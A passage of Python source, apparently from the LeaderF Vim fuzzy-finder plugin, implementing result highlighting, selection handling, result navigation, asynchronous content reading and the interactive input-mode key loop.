self._highlight_pos = [first_get_highlights(getDigest(line, 1))
for line in content[:highlight_number:unit]]
for i, pos in enumerate(self._highlight_pos):
start_pos = self._getDigestStartPos(content[unit*i], 1)
if start_pos > 0:
for j in range(len(pos)):
pos[j][0] += start_pos
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('Lf_hl_match', %s)")"""
% (self._getInstance().getPopupWinId(), str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('Lf_hl_match', %s)" % str(pos[j:j+8])))
self._highlight_ids.append(id)
self._highlight_refine_pos = [get_highlights(getDigest(line, 2))
for line in content[:highlight_number:unit]]
for i, pos in enumerate(self._highlight_refine_pos):
start_pos = self._getDigestStartPos(content[unit*i], 2)
if start_pos > 0:
for j in range(len(pos)):
pos[j][0] += start_pos
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('Lf_hl_matchRefine', %s)")"""
% (self._getInstance().getPopupWinId(), str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('Lf_hl_matchRefine', %s)" % str(pos[j:j+8])))
self._highlight_ids.append(id)
def _regexFilter(self, iterable):
def noErrMatch(text, pattern):
try:
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text, pattern))
except TypeError: # python 2
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text.replace('\x00', '\x01'), pattern))
except ValueError: # python 3
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text.replace('\x00', '\x01'), pattern))
except:
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text.replace('\x00', '\x01'), pattern))
try:
if ('-2' == lfEval("g:LfNoErrMsgMatch('', '%s')" % escQuote(self._cli.pattern))):
return iter([])
else:
return (line for line in iterable
if noErrMatch(escQuote(self._getDigest(line, 0)), escQuote(self._cli.pattern)))
except vim.error:
return iter([])
def _regexSearch(self, content, is_continue, step):
if not is_continue and not self._cli.isPrefix:
self._index = 0
self._result_content = self._filter(8000, self._regexFilter, content, is_continue)
self._getInstance().setBuffer(self._result_content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._result_content), True)
def clearSelections(self):
for i in self._selections.values():
if self._getInstance().getWinPos() == 'popup':
lfCmd("call matchdelete(%d, %d)" % (i, self._getInstance().getPopupWinId()))
else:
lfCmd("call matchdelete(%d)" % i)
self._selections.clear()
def _cleanup(self):
if not ("--recall" in self._arguments or lfEval("g:Lf_RememberLastSearch") == '1'):
self._pattern_bak = self._cli.pattern
self._cli.clear()
self._clearHighlights()
self._clearHighlightsPos()
self._help_length = 0
self._show_help = False
@modifiableController
def toggleHelp(self):
self._show_help = not self._show_help
if self._getInstance().isReverseOrder():
if self._help_length > 0:
del self._getInstance().buffer[-self._help_length:]
else:
del self._getInstance().buffer[:self._help_length]
if self._help_length > 0 and self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! %dk')" % (self._getInstance().getPopupWinId(), self._help_length))
self._createHelpHint()
self.clearSelections()
self._resetHighlights()
def _accept(self, file, mode, *args, **kwargs):
if file:
if self._getExplorer().getStlCategory() != "Jumps":
lfCmd("norm! m'")
if self._getExplorer().getStlCategory() != "Help":
if mode == '':
pass
elif mode == 'h':
lfCmd("split")
elif mode == 'v':
lfCmd("bel vsplit")
kwargs["mode"] = mode
tabpage_count = len(vim.tabpages)
self._acceptSelection(file, *args, **kwargs)
for k, v in self._cursorline_dict.items():
if k.valid:
k.options["cursorline"] = v
self._cursorline_dict.clear()
self._issue_422_set_option()
if mode == 't' and len(vim.tabpages) > tabpage_count:
tab_pos = int(lfEval("g:Lf_TabpagePosition"))
if tab_pos == 0:
lfCmd("tabm 0")
elif tab_pos == 1:
lfCmd("tabm -1")
elif tab_pos == 3:
lfCmd("tabm")
def accept(self, mode=''):
if self._getInstance().isReverseOrder():
if self._getInstance().window.cursor[0] > len(self._getInstance().buffer) - self._help_length:
lfCmd("norm! k")
return
else:
if self._getInstance().window.cursor[0] <= self._help_length:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute({}, 'norm! j')".format(self._getInstance().getPopupWinId()))
else:
lfCmd("norm! j")
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
return
if self._getExplorer().getStlCategory() == "Rg":
if self._getInstance().currentLine == self._getExplorer().getContextSeparator():
return
if "--heading" in self._arguments and not re.match(r'^\d+[:-]', self._getInstance().currentLine):
return
self._cli.writeHistory(self._getExplorer().getStlCategory())
# https://github.com/neovim/neovim/issues/8336
if lfEval("has('nvim')") == '1':
chdir = vim.chdir
else:
chdir = os.chdir
cwd = lfGetCwd()
if len(self._selections) > 0:
files = []
for i in sorted(self._selections.keys()):
files.append(self._getInstance().buffer[i-1])
if "--stayOpen" in self._arguments:
if self._getInstance().window.valid:
self._getInstance().cursorRow = self._getInstance().window.cursor[0]
self._getInstance().helpLength = self._help_length
try:
vim.current.tabpage, vim.current.window, vim.current.buffer = self._getInstance().getOriginalPos()
except vim.error: # error if the original buffer is a No Name buffer
pass
else:
self._getInstance().exitBuffer()
# https://github.com/Yggdroot/LeaderF/issues/257
win_local_cwd = lfEval("getcwd()")
if cwd != win_local_cwd:
chdir(cwd)
orig_cwd = lfGetCwd()
if mode == '' and self._getExplorer().getStlCategory() == "File":
self._accept(files[0], mode)
self._argaddFiles(files)
self._accept(files[0], mode)
lfCmd("doautocmd BufwinEnter")
else:
for file in files:
self._accept(file, mode)
dir_changed_by_autocmd = lfGetCwd() != orig_cwd
need_exit = True
else:
file = self._getInstance().currentLine
line_nr = self._getInstance().window.cursor[0]
need_exit = self._needExit(file, self._arguments)
if need_exit:
if "--stayOpen" in self._arguments:
if self._getInstance().window.valid:
self._getInstance().cursorRow = self._getInstance().window.cursor[0]
self._getInstance().helpLength = self._help_length
try:
vim.current.tabpage, vim.current.window, vim.current.buffer = self._getInstance().getOriginalPos()
except vim.error: # error if the original buffer is a No Name buffer
pass
else:
self._getInstance().exitBuffer()
# https://github.com/Yggdroot/LeaderF/issues/257
win_local_cwd = lfEval("getcwd()")
if cwd != win_local_cwd:
chdir(cwd)
orig_cwd = lfGetCwd()
self._accept(file, mode, self._getInstance().buffer, line_nr) # for bufTag
dir_changed_by_autocmd = lfGetCwd() != orig_cwd
if need_exit:
self._setAutochdir()
if not dir_changed_by_autocmd:
self._restoreOrigCwd()
return None
else:
self._beforeExit()
self._content = vim.current.buffer[:]
return False
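# _jumpNext()/_jumpPrevious() back the "--next"/"--previous" arguments: they
# advance the remembered cursor position inside the last result list (with
# wrap-around) and re-accept the entry under it without reopening the window.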
def _jumpNext(self):
instance = self._getInstance()
if instance.window is None or instance.empty() or len(instance.buffer) == self._help_length:
return False
if instance.isReverseOrder():
if instance.window.valid:
if instance.window.cursor[0] > len(instance.buffer) - self._help_length:
instance.window.cursor = (len(instance.buffer) - self._help_length, 0)
elif instance.window.cursor[0] == 1: # at the first line
instance.window.cursor = (len(instance.buffer) - self._help_length, 0)
else:
instance.window.cursor = (instance.window.cursor[0] - 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.window.cursor[0] - 1], "", self._getInstance().buffer, line_nr)
else:
if instance.cursorRow > len(instance.buffer) - instance.helpLength:
instance.cursorRow = len(instance.buffer) - instance.helpLength
line_nr = instance.cursorRow
elif instance.cursorRow == 1: # at the last line
line_nr = instance.cursorRow
instance.cursorRow = len(instance.buffer) - instance.helpLength
else:
line_nr = instance.cursorRow
instance.cursorRow -= 1
self._accept(instance.buffer[instance.cursorRow - 1], "", self._getInstance().buffer, line_nr)
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE"
% (len(instance.buffer) - instance.cursorRow - instance.helpLength + 1,
len(instance.buffer) - instance.helpLength))
else:
if instance.window.valid and self._getInstance().getWinPos() != 'popup':
if instance.window.cursor[0] <= self._help_length:
instance.window.cursor = (self._help_length + 1, 0)
elif instance.window.cursor[0] == len(instance.buffer): # at the last line
instance.window.cursor = (self._help_length + 1, 0)
else:
instance.window.cursor = (instance.window.cursor[0] + 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.window.cursor[0] - 1], "", self._getInstance().buffer, line_nr)
else:
if instance.cursorRow <= instance.helpLength:
instance.cursorRow = instance.helpLength + 1
line_nr = instance.cursorRow
elif instance.cursorRow == len(instance.buffer): # at the last line
line_nr = instance.cursorRow
instance.cursorRow = instance.helpLength + 1
else:
line_nr = instance.cursorRow
instance.cursorRow += 1
self._accept(instance.buffer[instance.cursorRow - 1], "", self._getInstance().buffer, line_nr)
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \
(instance.cursorRow - instance.helpLength, len(instance.buffer) - instance.helpLength))
return True
def _jumpPrevious(self):
instance = self._getInstance()
if instance.window is None or instance.empty() or len(instance.buffer) == self._help_length:
return False
if instance.isReverseOrder():
if instance.window.valid:
if instance.window.cursor[0] >= len(instance.buffer) - self._help_length:
instance.window.cursor = (1, 0)
else:
instance.window.cursor = (instance.window.cursor[0] + 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.window.cursor[0] - 1], "", self._getInstance().buffer, line_nr)
else:
if instance.cursorRow >= len(instance.buffer) - instance.helpLength:
instance.cursorRow = 1
line_nr = instance.cursorRow
else:
line_nr = instance.cursorRow
instance.cursorRow += 1
self._accept(instance.buffer[instance.cursorRow - 1], "", self._getInstance().buffer, line_nr)
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE"
% (len(instance.buffer) - instance.cursorRow - instance.helpLength + 1,
len(instance.buffer) - instance.helpLength))
else:
if instance.window.valid and self._getInstance().getWinPos() != 'popup':
if instance.window.cursor[0] <= self._help_length + 1:
instance.window.cursor = (len(instance.buffer), 0)
else:
instance.window.cursor = (instance.window.cursor[0] - 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.window.cursor[0] - 1], "", self._getInstance().buffer, line_nr)
else:
if instance.cursorRow <= instance.helpLength + 1:
instance.cursorRow = len(instance.buffer)
line_nr = instance.cursorRow
else:
line_nr = instance.cursorRow
instance.cursorRow -= 1
self._accept(instance.buffer[instance.cursorRow - 1], "", self._getInstance().buffer, line_nr)
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \
(instance.cursorRow - instance.helpLength, len(instance.buffer) - instance.helpLength))
def quit(self):
self._getInstance().exitBuffer()
self._setAutochdir()
self._restoreOrigCwd()
def refresh(self, normal_mode=True):
self._getExplorer().cleanup()
content = self._getExplorer().getFreshContent()
if not content:
lfCmd("echohl Error | redraw | echo ' No content!' | echohl NONE")
return
if normal_mode: # when called in Normal mode
self._getInstance().buffer.options['modifiable'] = True
self._clearHighlights()
self._clearHighlightsPos()
self.clearSelections()
self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent)
self._iteration_end = True
if self._cli.pattern:
self._index = 0
self._search(self._content)
if normal_mode: # when called in Normal mode
self._createHelpHint()
self._resetHighlights()
self._getInstance().buffer.options['modifiable'] = False
def addSelections(self):
nr = self._getInstance().window.number
if self._getInstance().getWinPos() != 'popup':
if (int(lfEval("v:mouse_win")) != 0 and
nr != int(lfEval("v:mouse_win"))):
return
elif nr == int(lfEval("v:mouse_win")):
lfCmd("exec v:mouse_lnum")
lfCmd("exec 'norm!'.v:mouse_col.'|'")
line_nr = self._getInstance().window.cursor[0]
if self._getInstance().isReverseOrder():
if line_nr > len(self._getInstance().buffer) - self._help_length:
lfCmd("norm! k")
return
else:
if line_nr <= self._help_length:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute({}, 'norm! j')".format(self._getInstance().getPopupWinId()))
else:
lfCmd("norm! j")
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
return
if line_nr in self._selections:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call matchdelete(%d, %d)" % (self._selections[line_nr], self._getInstance().getPopupWinId()))
else:
lfCmd("call matchdelete(%d)" % self._selections[line_nr])
del self._selections[line_nr]
else:
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_selection', '\\\\%%%dl.')")"""
% (self._getInstance().getPopupWinId(), line_nr))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % line_nr))
self._selections[line_nr] = id
def selectMulti(self):
orig_line = self._getInstance().window.cursor[0]
nr = self._getInstance().window.number
if (int(lfEval("v:mouse_win")) != 0 and
nr != int(lfEval("v:mouse_win"))):
return
elif nr == int(lfEval("v:mouse_win")):
cur_line = int(lfEval("v:mouse_lnum"))
self.clearSelections()
for i in range(min(orig_line, cur_line), max(orig_line, cur_line)+1):
if i > self._help_length and i not in self._selections:
id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % (i)))
self._selections[i] = id
def selectAll(self):
line_num = len(self._getInstance().buffer)
if line_num > 300:
lfCmd("echohl Error | redraw | echo ' Too many files selected!' | echohl NONE")
lfCmd("sleep 1")
return
for i in range(line_num):
if i >= self._help_length and i+1 not in self._selections:
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_selection', '\\\\%%%dl.')")"""
% (self._getInstance().getPopupWinId(), i+1))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % (i+1)))
self._selections[i+1] = id
def _gotoFirstLine(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute({}, 'norm! gg')".format(self._getInstance().getPopupWinId()))
else:
lfCmd("normal! gg")
def _readFinished(self):
pass
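# startExplorer() drives one search session: it applies the arguments,
# obtains the content from the explorer (a plain list, an
# AsyncExecutor.Result, or another iterable), fills the LeaderF buffer and
# then either enters the interactive input() loop or, when invoked with
# bang, keeps populating the buffer from the idle/timer callback.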
def startExplorer(self, win_pos, *args, **kwargs):
arguments_dict = kwargs.get("arguments", {})
if "--recall" in arguments_dict:
self._arguments["--recall"] = arguments_dict["--recall"]
elif "--previous" in arguments_dict:
self._arguments["--previous"] = arguments_dict["--previous"]
elif "--next" in arguments_dict:
self._arguments["--next"] = arguments_dict["--next"]
else:
self.setArguments(arguments_dict)
self._cli.setArguments(arguments_dict)
self._cli.setNameOnlyFeature(self._getExplorer().supportsNameOnly())
self._cli.setRefineFeature(self._supportsRefine())
self._orig_line = ''
if self._getExplorer().getStlCategory() in ["Gtags"]:
if "--update" in self._arguments or "--remove" in self._arguments:
self._getExplorer().getContent(*args, **kwargs)
return
if "--next" in arguments_dict:
if self._jumpNext() == False:
lfCmd("echohl Error | redraw | echo 'Error, no content!' | echohl NONE")
return
elif "--previous" in arguments_dict:
if self._jumpPrevious() == False:
lfCmd("echohl Error | redraw | echo 'Error, no content!' | echohl NONE")
return
self._cleanup()
# lfCmd("echohl WarningMsg | redraw | echo ' searching ...' | echohl NONE")
self._getInstance().setArguments(self._arguments)
empty_query = self._empty_query and self._getExplorer().getStlCategory() in ["File"]
remember_last_status = "--recall" in self._arguments \
or lfEval("g:Lf_RememberLastSearch") == '1' and self._cli.pattern
if remember_last_status:
content = self._content
self._getInstance().useLastReverseOrder()
win_pos = self._getInstance().getWinPos()
else:
content = self._getExplorer().getContent(*args, **kwargs)
self._getInstance().setCwd(lfGetCwd())
if self._getExplorer().getStlCategory() in ["Gtags"] and "--auto-jump" in self._arguments \
and isinstance(content, list) and len(content) == 1:
mode = self._arguments["--auto-jump"][0] if len(self._arguments["--auto-jump"]) else ""
self._accept(content[0], mode)
return
self._index = 0
pattern = kwargs.get("pattern", "") or arguments_dict.get("--input", [""])[0]
if len(pattern) > 1 and (pattern[0] == '"' and pattern[-1] == '"'
or pattern[0] == "'" and pattern[-1] == "'"):
pattern = pattern[1:-1]
self._cli.setPattern(pattern)
self._result_content = []
self._cb_content = []
if not content:
lfCmd("echohl Error | redraw | echo ' No content!' | echohl NONE")
return
# clear the buffer only when the content is not a list
self._getInstance().enterBuffer(win_pos, not isinstance(content, list))
self._initial_count = self._getInstance().getInitialWinHeight()
self._getInstance().setStlCategory(self._getExplorer().getStlCategory())
self._setStlMode(**kwargs)
self._getInstance().setStlCwd(self._getExplorer().getStlCurDir())
if kwargs.get('bang', 0):
self._current_mode = 'NORMAL'
else:
self._current_mode = 'INPUT'
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')"
% (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
if not remember_last_status:
self._gotoFirstLine()
self._start_time = time.time()
self._bang_start_time = self._start_time
self._bang_count = 0
self._getInstance().buffer.vars['Lf_category'] = self._getExplorer().getStlCategory()
self._read_content_exception = None
if isinstance(content, list):
self._is_content_list = True
self._read_finished = 2
if not remember_last_status:
if len(content[0]) == len(content[0].rstrip("\r\n")):
self._content = content
else:
self._content = [line.rstrip("\r\n") for line in content]
self._getInstance().setStlTotal(len(self._content)//self._getUnit())
self._getInstance().setStlResultsCount(len(self._content))
if not empty_query:
self._getInstance().setBuffer(self._content[:self._initial_count])
if lfEval("has('nvim')") == '1':
lfCmd("redrawstatus")
self._callback = self._workInIdle
if not kwargs.get('bang', 0):
self._readFinished()
self.input()
else:
if not remember_last_status and not empty_query:
self._getInstance().appendBuffer(self._content[self._initial_count:])
elif remember_last_status and len(self._getInstance().buffer) < len(self._result_content):
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
lfCmd("echo")
if self._cli.pattern:
self._cli._buildPrompt()
self._getInstance().buffer.options['modifiable'] = False
self._bangEnter()
self._getInstance().mimicCursor()
if not remember_last_status and not self._cli.pattern and empty_query:
self._gotoFirstLine()
self._guessSearch(self._content)
if self._result_content: # self._result_content is [] only if
# self._cur_buffer.name == '' or self._cur_buffer.options["buftype"] not in [b'', '']:
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
else:
self._getInstance().appendBuffer(self._content[self._initial_count:])
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self._bangReadFinished()
lfCmd("echohl WarningMsg | redraw | echo ' Done!' | echohl NONE")
elif isinstance(content, AsyncExecutor.Result):
self._is_content_list = False
self._callback = self._workInIdle
if lfEval("get(g:, 'Lf_NoAsync', 0)") == '1':
self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent)
self._read_finished = 1
self._offset_in_content = 0
else:
if self._getExplorer().getStlCategory() in ["Rg", "Gtags"]:
if "--append" in self.getArguments():
self._offset_in_content = len(self._content)
if self._pattern_bak:
self._getInstance().setBuffer(self._content, need_copy=False)
self._createHelpHint()
else:
self._getInstance().clearBuffer()
self._content = []
self._offset_in_content = 0
else:
self._content = []
self._offset_in_content = 0
self._read_finished = 0
self._stop_reader_thread = False
self._reader_thread = threading.Thread(target=self._readContent, args=(content,))
self._reader_thread.daemon = True
self._reader_thread.start()
if not kwargs.get('bang', 0):
self.input()
else:
lfCmd("echo")
self._getInstance().buffer.options['modifiable'] = False
self._bangEnter()
self._getInstance().mimicCursor()
else:
self._is_content_list = False
self._callback = partial(self._workInIdle, content)
if lfEval("get(g:, 'Lf_NoAsync', 0)") == '1':
self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent)
self._read_finished = 1
self._offset_in_content = 0
else:
self._content = []
self._offset_in_content = 0
self._read_finished = 0
if not kwargs.get('bang', 0):
self.input()
else:
lfCmd("echo")
self._getInstance().buffer.options['modifiable'] = False
self._bangEnter()
self._getInstance().mimicCursor()
def _readContent(self, content):
try:
for line in content:
self._content.append(line)
if self._stop_reader_thread:
break
else:
self._read_finished = 1
except Exception:
self._read_finished = 1
self._read_content_exception = sys.exc_info()
def _setResultContent(self):
if len(self._result_content) > len(self._getInstance().buffer):
self._getInstance().setBuffer(self._result_content)
elif self._index == 0:
self._getInstance().setBuffer(self._content, need_copy=True)
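# _workInIdle() is the idle/timer callback: it drains newly read lines into
# self._content, updates the statusline counters, feeds _search() another
# chunk while a pattern is being typed, and finishes filling the buffer once
# reading is reported as done.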
@catchException
def _workInIdle(self, content=None, bang=False):
if self._read_content_exception is not None:
if bang:
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
lfPrintError(self._read_content_exception[1])
return
else:
raise self._read_content_exception[1]
if not bang and not self._preview_open and lfEval("get(g:, 'Lf_PreviewInPopup', 0)") == '1' \
and not self._getInstance().empty():
self._previewResult(False)
self._preview_open = True
if self._is_content_list:
if self._cli.pattern and (self._index < len(self._content) or len(self._cb_content) > 0):
if self._fuzzy_engine:
step = 60000 * cpu_count
elif is_fuzzyMatch_C:
step = 10000
else:
step = 2000
self._search(self._content, True, step)
return
if content:
i = -1
for i, line in enumerate(itertools.islice(content, 20)):
self._content.append(line)
if i == -1 and self._read_finished == 0:
self._read_finished = 1
if self._read_finished > 0:
if self._read_finished == 1:
self._read_finished += 1
self._getExplorer().setContent(self._content)
self._getInstance().setStlTotal(len(self._content)//self._getUnit())
self._getInstance().setStlRunning(False)
if self._cli.pattern:
self._getInstance().setStlResultsCount(len(self._result_content))
elif self._empty_query and self._getExplorer().getStlCategory() in ["File"]:
self._guessSearch(self._content)
if bang:
if self._result_content: # self._result_content is [] only if
# self._cur_buffer.name == '' or self._cur_buffer.options["buftype"] not in [b'', '']:
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
else:
self._getInstance().appendBuffer(self._content[self._initial_count:])
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self._bangReadFinished()
lfCmd("echohl WarningMsg | redraw | echo ' Done!' | echohl NONE")
else:
if bang:
if self._getInstance().empty():
self._offset_in_content = len(self._content)
if self._offset_in_content > 0:
self._getInstance().appendBuffer(self._content[:self._offset_in_content])
else:
cur_len = len(self._content)
if cur_len > self._offset_in_content:
self._getInstance().appendBuffer(self._content[self._offset_in_content:cur_len])
self._offset_in_content = cur_len
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self._bangReadFinished()
lfCmd("echohl WarningMsg | redraw | echo ' Done!' | echohl NONE")
else:
self._getInstance().setBuffer(self._content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._content))
if self._getInstance().getWinPos() not in ('popup', 'floatwin'):
lfCmd("redrawstatus")
if self._cli.pattern:
if self._index < len(self._content) or len(self._cb_content) > 0:
if self._fuzzy_engine:
step = 60000 * cpu_count
elif is_fuzzyMatch_C:
step = 10000
else:
step = 2000
self._search(self._content, True, step)
if bang:
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
else:
cur_len = len(self._content)
if time.time() - self._start_time > 0.1:
self._start_time = time.time()
self._getInstance().setStlTotal(cur_len//self._getUnit())
self._getInstance().setStlRunning(True)
if self._cli.pattern:
self._getInstance().setStlResultsCount(len(self._result_content))
else:
self._getInstance().setStlResultsCount(cur_len)
if self._getInstance().getWinPos() not in ('popup', 'floatwin'):
lfCmd("redrawstatus")
if self._cli.pattern:
if self._index < cur_len or len(self._cb_content) > 0:
if self._fuzzy_engine:
step = 60000 * cpu_count
elif is_fuzzyMatch_C:
step = 10000
else:
step = 2000
self._search(self._content[:cur_len], True, step)
else:
if bang:
if self._getInstance().empty():
self._offset_in_content = len(self._content)
if self._offset_in_content > 0:
self._getInstance().appendBuffer(self._content[:self._offset_in_content])
else:
cur_len = len(self._content)
if cur_len > self._offset_in_content:
self._getInstance().appendBuffer(self._content[self._offset_in_content:cur_len])
self._offset_in_content = cur_len
if self._getInstance().getWinPos() not in ('popup', 'floatwin') \
and time.time() - self._bang_start_time > 0.5:
self._bang_start_time = time.time()
lfCmd("echohl WarningMsg | redraw | echo ' searching %s' | echohl NONE" % ('.' * self._bang_count))
self._bang_count = (self._bang_count + 1) % 9
elif len(self._getInstance().buffer) < min(cur_len, self._initial_count):
self._getInstance().setBuffer(self._content[:self._initial_count])
@modifiableController
def input(self):
self._preview_open = False
self._current_mode = 'INPUT'
self._getInstance().hideMimicCursor()
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')"
% (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
if self._getInstance().getWinPos() == 'popup':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', '%s')"
% (self._getInstance().getPopupWinId(), 'leaderf#PopupFilter'))
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self.clearSelections()
self._hideHelp()
self._resetHighlights()
if self._cli.pattern: # --input xxx or from normal mode to input mode
if self._index == 0: # --input xxx
self._search(self._content)
elif self._empty_query and self._getExplorer().getStlCategory() in ["File"] \
and "--recall" not in self._arguments:
self._guessSearch(self._content)
for cmd in self._cli.input(self._callback):
cur_len = len(self._content)
cur_content = self._content[:cur_len]
if equal(cmd, '<Update>'):
if self._getInstance().getWinPos() == 'popup':
if self._getInstance()._window_object.cursor[0] > 1:
lfCmd("call win_execute({}, 'norm! gg')".format(self._getInstance().getPopupWinId()))
self._search(cur_content)
elif equal(cmd, '<Shorten>'):
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
self._search(cur_content)
elif equal(cmd, '<Mode>'):
self._setStlMode()
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._getInstance().setPopupStl(self._current_mode)
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
if self._cli.pattern:
self._search(cur_content)
elif equal(cmd, '<C-K>'):
self._toUp()
self._previewResult(False)
elif equal(cmd, '<C-J>'):
self._toDown()
self._previewResult(False)
elif equal(cmd, '<Up>'):
if self._cli.previousHistory(self._getExplorer().getStlCategory()):
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
self._search(cur_content)
elif equal(cmd, '<Down>'):
if self._cli.nextHistory(self._getExplorer().getStlCategory()):
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
self._search(cur_content)
elif equal(cmd, '<LeftMouse>'):
if self._leftClick():
break
self._previewResult(False)
elif equal(cmd, '<2-LeftMouse>'):
self._leftClick()
if self.accept() is None:
break
elif equal(cmd, '<CR>'):
if self.accept() is None:
break
elif equal(cmd, '<C-X>'):
if self.accept('h') is None:
break
elif equal(cmd, '<C-]>'):
if self.accept('v') is None:
break
elif equal(cmd, '<C-T>'):
if self.accept('t') is None:
break
elif equal(cmd, '<C-\>'):
actions = ['', 'h', 'v', 't', 'dr']
action_count = len(actions)
selection = int( vim.eval(
'confirm("Action?", "&Edit\n&Split\n&Vsplit\n&Tabnew\n&Drop")' ) ) - 1
if selection < 0 or selection >= action_count:
selection = 0
action = actions[selection]
if self.accept(action) is None:
break
elif equal(cmd, '<Quit>'):
self._cli.writeHistory(self._getExplorer().getStlCategory())
self.quit()
break
elif equal(cmd, '<Tab>'): # switch to Normal mode
self._current_mode = 'NORMAL'
if self._getInstance().getWinPos() == 'popup':
if lfEval("exists('*leaderf#%s#NormalModeFilter')" % self._getExplorer().getStlCategory()) == '1':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', '%s')" % (self._getInstance().getPopupWinId(),
'leaderf#%s#NormalModeFilter' % self._getExplorer().getStlCategory()))
else:
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', function('leaderf#NormalModeFilter', [%d]))"
% (self._getInstance().getPopupWinId(), id(self)))
self._setResultContent()
self.clearSelections()
self._cli.hideCursor()
self._createHelpHint()
self._resetHighlights()
if self._getInstance().isReverseOrder() and self._cli.pattern \
and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \
and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")):
self._highlight_method()
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')"
% (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
break
elif equal(cmd, '<F5>'):
self.refresh(False)
elif equal(cmd, '<C-LeftMouse>') or equal(cmd, '<C-S>'):
if self._getExplorer().supportsMulti():
self.addSelections()
elif equal(cmd, '<S-LeftMouse>'):
if self._getExplorer().supportsMulti():
self.selectMulti()
elif equal(cmd, '<C-A>'):
if self._getExplorer().supportsMulti():
self.selectAll()
elif equal(cmd, '<C-L>'):
self.clearSelections()
elif equal(cmd, '<C-P>'):
self._ctrlp_pressed = True
self._previewResult(True)
self._ctrlp_pressed = False
elif equal(cmd, '<PageUp>'):
self._pageUp()
self._previewResult(False)
elif equal(cmd, '<PageDown>'):
self._pageDown()
self._previewResult(False)
